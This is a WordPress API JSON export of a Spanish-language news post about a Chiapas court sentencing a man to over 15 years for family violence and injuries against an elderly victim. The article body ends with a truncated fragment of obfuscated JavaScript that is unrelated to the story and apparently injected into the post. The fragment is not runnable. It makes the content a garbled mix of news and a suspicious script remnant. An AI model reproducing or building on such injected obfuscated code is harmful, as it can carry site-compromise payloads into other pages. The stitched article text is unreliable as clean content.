{"id":24127,"date":"2025-09-22T04:13:50","date_gmt":"2025-09-22T04:13:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24127"},"modified":"2025-09-22T04:13:51","modified_gmt":"2025-09-22T04:13:51","slug":"poder-judicial-del-estado-dicta-sentencia-condenatoria-por-los-delitos-de-violencia-familiar-agravada-y-lesiones-calificadas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24127","title":{"rendered":"Poder Judicial del Estado dicta sentencia condenatoria por los delitos de Violencia Familiar Agravada y Lesiones Calificadas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500-1024x678.jpg\" alt=\"\" class=\"wp-image-24128\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500-768x508.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000345500.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-15 a\u00f1os de prisi\u00f3n a Pedro \u201cN\u201d por su responsabilidad penal en los hechos ocurridos en el municipio de Tumbal\u00e1, Chiapas.<\/p>\n\n\n\n<p>21 de septiembre del 2025. Tuxtla Guti\u00e9rrez<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria en contra de una persona del sexo masculino por los delitos de Violencia Familiar Agravada y Lesiones Calificadas, cometidos en agravio de un adulto de la tercera edad con identidad reservada.<\/li>\n<\/ul>\n\n\n\n<p>Tras los hechos ocurridos en el municipio de Tumbal\u00e1, Chiapas, se logr\u00f3 acreditar la participaci\u00f3n y responsabilidad penal del hoy sentenciado, luego del desahogo de pruebas realizado por el \u00f3rgano t\u00e9cnico de investigaci\u00f3n y acusaci\u00f3n durante las audiencias orales.<\/p>\n\n\n\n<p>Por lo que el Juzgado de Control y Tribunal de Enjuiciamiento del distrito judicial de Yajal\u00f3n determin\u00f3 imponer a Pedro \u201cN\u201d una pena de 15 a\u00f1os y dos meses de prisi\u00f3n, as\u00ed como el pago de la reparaci\u00f3n del da\u00f1o. Adem\u00e1s, no se le concedi\u00f3 ning\u00fan beneficio penal al sentenciado.<\/p>\n\n\n\n<p>Con esta sentencia, el Poder Judicial del Estado, que preside Juan Carlos Moreno Guill\u00e9n, reafirma su compromiso con la impartici\u00f3n de una justicia m\u00e1s humana, en donde ning\u00fan delito que atente contra la vida y la integridad de las y los chiapanecos quede impune.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-15 a\u00f1os de prisi\u00f3n a Pedro \u201cN\u201d por su responsabilidad penal en los hechos ocurridos en el municipio de Tumbal\u00e1, Chiapas. 21 de septiembre del 2025. Tuxtla Guti\u00e9rrez El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria en contra de una persona del sexo masculino por los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24127","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24127"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24127\/revisions"}],"predecessor-version":[{"id":24129,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24127\/revisions\/24129"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24128"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}